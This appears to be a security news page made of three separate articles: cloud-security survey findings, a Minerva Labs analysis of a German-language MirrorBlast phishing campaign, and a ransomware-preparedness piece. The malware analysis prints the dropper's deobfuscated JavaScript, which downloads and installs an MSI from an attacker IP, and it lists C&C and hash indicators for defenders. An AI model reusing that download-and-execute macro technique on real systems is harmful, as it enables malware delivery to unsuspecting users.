451 Research released new findings titled “Modern Clouds Need a Novel Security Approach”, highlighting the challenges with fast-moving and increasing cloud security adoption and how to address them. Key findings include:

• Cloud remains a significant gap for InfoSec
• Security teams are looking to catch up in cloud expertise
• Newer cloud security work is collaborative
• Newer cloud deployment environments are increasingly automated
• Centralized teams feel the brunt of multi-cloud and multi-platform

451 Research regularly reaches out to key IT stakeholders to research, among other things, different quantitative and qualitative aspects of their security programs. 451 Research found that having adequate knowledge of cloud platform capabilities and security controls topped the list of information security gaps for both 2019 (48%) and 2020 (41%). 

Gajraj Singh, Chief Marketing Officer, Blue Hexagon had this commentary:

 “As security teams prepare to scale up expertise on securing cloud environments, we find it vital to require deep collaboration between cloud engineering and security. Security teams must be aware that they will need to support newer, faster processes, as well as new technology options, including a variety of cloud workloads, services, operating systems and serverless function execution. It is critical to cover the spectrum of security use cases along the entire lifecycle of building within the code development pipeline, deployment to cloud and runtime monitoring and enforcement.”

Seeing as more and more companies are moving some or all of their infrastructure to the cloud, it is vital that their InfoSec game has to be on point or bad things will happen.

By Minerva Labs (www.minerva-labs.com)

MirrorBlast malware is a trojan that is known for attacking users’ browsers. It usually pretends to be a legitimate browser add-on however it has now evolved additional capabilities whereby other malware are installed simultaneously. Lately, this trojan is thought to have tentative links to TA505 and PYSA groups.

Yesterday, a new MirrorBlast phishing campaign focused on German-speaking countries was discovered. A malicious Microsoft Excel file named “Bericht(entwurf).xls”, which translates to “Report (draft)”, was found to be used as a dropper of the MirrorBlast trojan. The Excel file requests the user to “Enable Content” which ultimately activates the macro embedded within the file:

Once the content is enabled, an Auto_Open macro is executed. The macro executes a JavaScript stored in the first cell of the sheet:

In the sample above, no anti-sandbox checks were included in the macro, however several sources reported a different script that did contain these checks.

To see the JavaScript hidden in cell A1, it was required to move the picture. This wasn’t possible as the sheet was password protected:

This obstacle can be easily bypassed, for example using the script found here.

Below is the hidden malicious JavaScript:

Once deobfuscated, the JavaScript is: “with(new Activexobject(“WindowsInstaller.Installer”)){UILevel=2;InstallProduct)”http://5.189.222[.]161″)}”. It directly downloads a “load.msi” file from 5.189.222[.]161.

The .msi installs Rebol-View software (a legitimate software) and executes a script encrypted with base64. Here is how it looks after decryption:

The script collects data and communicates with the C&C server using the Rebol-View tool.

REBOL is a “multi-paradigm dynamic programming language” that was designed to be used for network communications and distributed computing. It is multi-platform, can run on any operating system (OS), and it introduced the idea of dialecting —small, optimized, domain-specific languages for code and data.

It can be used to program internet applications (client and server-side), database applications, utilities, and multimedia applications.

It is important to mention that REBOL itself is not a malicious program. It has been used for many legitimate operations. Recently this tool was used as C&C environment in several attacks, more information can be found here.

In the time of writing, the malicious excel file has only been found by five AV engines.

Minerva Labs Malicious Document Prevention module prevents the drop of the initial stage installer, stopping the attack at its very first stage, before it causes any damage.

 

IOC’s

IP’s:

http://5.189.222[.]161

http://feristoaul[.]com – C&C server

Hashes:

Bericht(entwurf).xls – 7904e73defa12c220cdc04d059cfc8acf3ae96dad41c7bb26381f076f17004cf

load.msi – eceb164a69e8f79bb08099fcdf2b75071c527b0107daebc0e7a88e246b4c7f13

exemple.rb – 9c109c41d497cbe752edf56c1ac0e1ffb06357160b12100cc84eb2d4ddcb7b13

rebol-view-278-3-1.exe – 215e28f9660472b6271a9902573c9d190e4d7ccca33fcf8d6054941d52a3ab85

References

MirrorBlast Malware Removal Steps

October is Cybersecurity Awareness Month and prevention should be atop every company’s priority list. With ransomware threats on the rise, Technologent’s Jon Mendoza, Chief Information Security Officer, and David Martinez, Security Practice Director, discuss how to prepare and be ready for a cyberattack.

Every news cycle seems to bring another story of a ransomware attack. Assaults on businesses are on the rise, and the statistics back it up. Since COVID-19 began in 2020, cybercrime has increased 600% and it is estimated that there is a cyberattack every 11 seconds around the world.⁽¹⁾ The increase in employees working from home has only intensified this threat in the eyes of many IT experts, with more than 80% reporting that remote workers are a ticking time bomb for corporations.⁽²⁾ As part of a broader effort by the National Cyber Security Alliance and the U.S. Department of Homeland Security (DHS) to help Americans stay safer and more secure online, October has been designated Cybersecurity Awareness Month .⁽³⁾

Cybersecurity begins with being prepared, something too many companies are not proactive about, according to Technologent’s Chief Information Security Officer Jon Mendoza. “It starts with an understanding of the current state of your environment and specifically your security posture,” he explains. Bringing in a third party to conduct a security audit of a company’s IT system is a good place to start because this can recognize potential security gaps. Simulating an attack offers the opportunity for a company to gauge its response to different scenarios and to discover how the various parts of an organization would be affected and how they could respond. This type of drill would examine the impact on a company’s customers, as well as their ability to generate revenue and how quickly they could recover from a cybersecurity attack.

Mendoza cautions that simply focusing on technology is not enough. Any drills must factor in an organization’s people. “When you’re looking at the other aspects of what makes an organization vulnerable,” Mendoza says, “reducing risk is of critical importance, but understanding what those risks are is also important.” The risks will vary from organization to organization, and from sector to sector.

Addressing the human factor is critical and must focus on training and raising security awareness. Too many companies have fallen short in these areas despite having spent a lot of money on technology and security controls. However, they have not paid enough attention to how the end user is being trained. In terms of raising awareness, organizations cannot continue to do things as they have in the past. Cybersecurity threats are evolving, and the approach companies take must also change and adapt accordingly.

Too many companies, their CEOs, and their employees don’t view cybersecurity as their problem and instead deem it an issue for their IT departments. Case in point—intellectual property is at least as valuable as any other company asset—everyone needs to be trained to protect it to ensure the survival of their organization. Multifactor authentication and security awareness training both play a pivotal role in not only protecting intellectual property but also in teaching employees what their role is in security.

Ransomware, one of the most obvious aspects of cybersecurity that has been dominating the news, most often infiltrates a company via email. It has been estimated that one in every 6,000 emails contain something suspicious that could be ransomware⁽⁴⁾ and more than 90% of phishing emails contain ransomware.⁽⁵⁾ While emails have historically been the entry point for those using ransomware, the threat is evolving with more attacks coming via mobile phones, and users are more likely to be distracted when using them and click on a link without vetting it thoroughly.

The recent Colonial Pipeline breach offers an object lesson for handling a ransomware attack. One of the main pillars of good cybersecurity is having a good inventory of physical assets and all digital or cloud technology assets. David Martinez, Security Practice Director for Technologent, explains how the Colonial Pipeline was compromised due to poor endpoint protection deployment. “For half of the ransom they paid, Colonial Pipeline could get a phenomenal endpoint protection solution,” he says. “Prevention is a way more cost-effective means of handling cybersecurity.”

A cyberattack not only costs a company money, it also costs them in terms of their reputation, public trust, and social disruption—aspects of a company’s value that are challenging to quantify. In terms of the customer, the public’s awareness of the business and the nature of the business affect how the customer interaction comes into play for the financial loss and loss of trust the business may experience. The law covers not only the levy of fees and fines, it also involves public safety. The reaction in this area will also depend on the type of business involved. Finally, governance evaluates the sensitivity and criticality of the data that was breached. Criticality is the impact on business operations or the public at large; sensitivity is the nature of the data. 

From the end user to the CEO and from software to third-party evaluators, all parties must give their full participation. Cybercriminals may continue to find new ways of attack, but companies can be prepared—the key is information, awareness of possible gaps in their IT security, and taking proactive measures to protect themselves.

“The silver lining in all these things happening in the news is that it has really put a spotlight on the problem,” Mendoza observes. “Historically, most organizations have not necessarily funded their security programs appropriately, but that is changing.”

About Technologent:

Technologent is a Global Provider of Edge-to-Edge^TM Information Technology Solutions and Services for Fortune 1000 companies. They help companies outpace the new digital economy by creating IT environments that are fast, flexible, efficient, transparent and secure. Without these characteristics, companies will miss the opportunity to optimally scale. Technologent mobilizes the power of technology to turn vision into reality, enabling a focus on driving innovation, increasing productivity and outperforming the market. Visit www.technologent.com.

1. Embroker Team; “202 Must Know Cyber Attack Statistics and Trends”; 11 Aug 2021; Embroker; embroker.com/blog/cyber-attack-statistics/
2. Gately, Edward; “HP Wolf Security: Employees Pushing Back Against Efforts to Improve Security”; Channel Future; September 9, 021; channelfutures.com/channel-research/hp-wolf-security-employees-pushing-back-against-efforts-to-improve-security
3. “About Cybersecurity Awareness Month”; Accessed October 1, 2021;staysafeonline.org/cybersecurity-awareness-month/about-the-month
4. Morgan, Steve; “Global Ransomware Damage Costs Predicted To Reach $20 Billion (USD) By 2021”; Cybercrime Magazine; October 21, 2019; cybersecurityventures.com/global-ransomware-damage-costs-predicted-to-reach-20-billion-usd-by-2021/
5. Korolov, Maria; “93% of phishing emails are now ransomware”; CSO: June 1, 2016; csoonline.com/article/3077434/93-of-phishing-emails-are-now-ransomware.html